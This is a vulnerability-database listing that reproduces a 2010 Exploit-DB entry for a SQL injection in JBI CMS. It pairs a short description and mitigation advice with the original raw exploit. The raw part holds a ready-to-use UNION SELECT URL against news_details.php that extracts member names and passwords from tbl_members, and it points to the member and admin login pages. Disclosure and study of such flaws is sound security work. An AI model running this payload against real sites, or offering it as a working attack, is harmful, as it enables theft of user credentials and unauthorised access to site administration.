header-logo
Suggest Exploit
vendor:
JBI CMS
by:
Cru3l.b0y
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: JBI CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 10.10
2010

JBI CMS SQL Injection Vulnerability

A SQL injection vulnerability exists in JBI CMS, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'news_details.php' script. An attacker can exploit this vulnerability to gain access to the application's database, including sensitive information such as usernames and passwords. The vulnerable script is located at '/path/news_details.php' and the login pages for members and admins are located at '/member.php' and '/admin.php' respectively.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

In The Name Of GOD
[+] Exploit Title: JBI CMS SQL Injection Vulnerability
[+] Date: 2010-11-04
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.jamesblakeinternet.com/london/cms
[+] Tested on: Ubuntu 10.10
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit : 

             http://target/path/news_details.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,password),5,6,7+from+tbl_members
			    
Login page for members : /member.php
Login page for Admins  : /admin

Navigation

Suggest Exploit

Services By CQR